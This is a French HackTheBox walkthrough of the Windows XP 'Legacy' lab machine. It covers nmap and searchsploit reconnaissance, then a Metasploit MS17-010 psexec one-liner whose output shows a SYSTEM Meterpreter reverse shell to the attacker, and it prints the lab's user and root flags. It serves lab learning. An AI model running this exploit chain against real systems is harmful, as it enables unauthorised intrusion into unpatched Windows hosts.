HackTheBox Walkthrough - Legacy¶
Machine ciblée : Legacy.
Répertoire : /home/kali/Legacy
Temps passé dessus : 30min
Changelog du template¶
Version 1.0 - Sep. 2022 : création du template de base
Version 1.1 - Oct. 2022 : Rajout des scan nmap et des commandes de base
Version 1.2 - Nov. 2022 : Rajout des redirection pour éviter les retours d’erreur et du domaine pour être compliant avec TryHackMe
Version 1.3 - Nov. 2022 : Ajout du scan UDP + de l’export vers searchsploit
Phase 1 : Reconnaissance¶
┌──(kali㉿kali)-[~]
└─$
name="Legacy"
repository="/home/kali/$name"
ip="10.10.10.4"
domain='htb'
cd $repository 2&>/dev/null || mkdir $repository && cd $repository
grep "$ip $name ${name}.${domain}" /etc/hosts >/dev/null || echo "$ip $name ${name}.${domain}" | sudo tee -a /etc/hosts
nmap -Pn -A -T5 --top-port 1000 -oN $repository/txt $ip
nmap -Pn -A -T5 -p - -oN $repository/full -oX $repository/sploitable $ip
searchsploit --nmap $repository/sploitable
sudo nmap -Pn -A -T5 -sU -p - -oN $repository/udp -oX $repository/udploitable $ip
searchsploit --nmap $repository/udploitable
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-04 17:54 CET
Nmap scan report for Legacy (10.10.10.4)
Host is up (0.019s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 005056b9a49a (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2022-12-09T20:52:38+02:00
|_clock-skew: mean: 5d00h57m40s, deviation: 1h24m51s, median: 4d23h57m40s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.40 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-04 17:55 CET
Nmap scan report for Legacy (10.10.10.4)
Host is up (0.017s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h57m40s, deviation: 1h24m51s, median: 4d23h57m40s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 005056b9a49a (VMware)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2022-12-09T20:53:13+02:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.30 seconds
[i] SearchSploit s XML mode (without verbose enabled). To enable: searchsploit -v --xml...
[i] Reading: '/home/kali/Legacy/sploitable'
[i] /usr/bin/searchsploit -t msrpc
[i] /usr/bin/searchsploit -t microsoft windows rpc
------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------ ---------------------------------
Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011) | windows/remote/293.c
Microsoft Windows - 'RPC DCOM' Long Filename Overflow (MS03-026) | windows/remote/100.c
Microsoft Windows - 'RPC DCOM' Remote (1) | windows/remote/69.c
Microsoft Windows - 'RPC DCOM' Remote (2) | windows/remote/70.c
Microsoft Windows - 'RPC DCOM' Remote (Universal) | windows/remote/76.c
Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow | windows/remote/64.c
Microsoft Windows - 'RPC DCOM' Scanner (MS03-039) | windows/remote/97.c
Microsoft Windows - 'RPC DCOM2' Remote (MS03-039) | windows/remote/103.c
Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption | windows/dos/3453.py
Microsoft Windows - DCOM RPC Interface Buffer Overrun | windows/remote/22917.txt
Microsoft Windows - DNS RPC Remote Buffer Overflow (2) | windows/remote/3746.txt
Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit) | windows/local/45562.rb
Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit) | windows/local/45562.rb
Microsoft Windows 10 1903/1809 - RPCSS Activation Kernel Security Callback Privilege Escalation | windows/local/47135.txt
Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow | windows/remote/5.c
Microsoft Windows 8.1 - DCOM DCE/RPC Local NTLM Reflection Privilege Escalation (MS15-076) | windows/local/37768.txt
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1) | windows/remote/4745.cpp
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2) | windows/remote/4934.c
Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service | windows/dos/61.c
Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow | windows/remote/3737.py
Microsoft Windows XP/2000 - 'RPC DCOM' Remote (MS03-026) | windows/remote/66.c
Microsoft Windows XP/2000 - RPC Remote Non Exec Memory | windows/remote/117.c
Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation | windows/local/32892.txt
------------------------------------------------------------------------------------------------ ---------------------------------
[i] /usr/bin/searchsploit -t netbios ssn
[i] /usr/bin/searchsploit -t microsoft windows netbios ssn
[i] /usr/bin/searchsploit -t microsoft ds
On se retrouve avec quasiment la même configuration que pour Eternal Blue. Et pour cause, cette dernière passerait également. Mais c’est trop simple et pas l’objectif initial de cette box alors j’ai regardé le write-up pour avoir une piste un peu plus visible : il s’agirait d’une autre CVE qui exploite également smb. Recherchons tout ça sur internet : on trouve ça. ~~D’ailleurs, sans doute beaucoup plus intéresant, on trouve également un article sur comment exploiter la même faille à la main~~ Il s’agit en faite d’un TP sur Eternal Blue >.>
Phase 2 : Analyse¶
Je me suis dit que j’allais tenter l’attaque à la main. Après tout, si je voulais que ça ailles vite, j’aurai utiliser Eternal Blue et rien appris de plus. On commence donc par relancer le scan nmap avec l’option --script vuln (rajouté au template). On retrouve donc le message suivant :
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
Je me suis arrêté là car j’ai compris après que c’était pas du tout la même faille …
Phase 3 : User¶
Bon, avec metasploit, c’est extrêmement simple :
┌──(kali㉿kali)-[~/Legacy]
└─$ localip=`ip a | grep tun0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
┌──(kali㉿kali)-[~/Legacy]
└─$ msfconsole -qx "use exploit/windows/smb/ms17_010_psexec; set RHOSTS $ip ; set LHOST $localip; run"
[*] Using configured payload windows/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x86478230
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... osjRMtyb.exe
[*] 10.10.10.4:445 - Created \osjRMtyb.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (175686 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \osjRMtyb.exe...
[*] Meterpreter session 3 opened (10.10.14.5:4444 -> 10.10.10.4:1034) at 2022-12-04 18:16:21 +0100
meterpreter > cd /Users
[-] stdapi_fs_chdir: Operation failed : The system cannot find the file specified.
meterpreter > cd /
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2017-03-16 07:07:20 +0100 Documents and Settings
[...]
meterpreter > cd Documents\ and\ Settings
meterpreter > ls
Listing: C:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2017-03-16 07:07:21 +0100 Administrator
040777/rwxrwxrwx 0 dir 2017-03-16 06:33:42 +0100 john
[...]
meterpreter > cat Administrator/Desktop/root.txt
993442d258b0e0ec917cae9e695d5713
meterpreter > cat john/Desktop/user.txt
e69af0e4f443de7e36876fda4ec7644f
Phase 4 : Élévation de privilège¶
Ici encore, pas de PE.
Récapitulatif¶
On note que c’était Documents & Settings sur du XP !
A retenir¶
SMB c’est le mal.
L’option
--script vulnde nmap n’est pas activé par défaut avec le-A. Je l’ai rajouté à mes templates.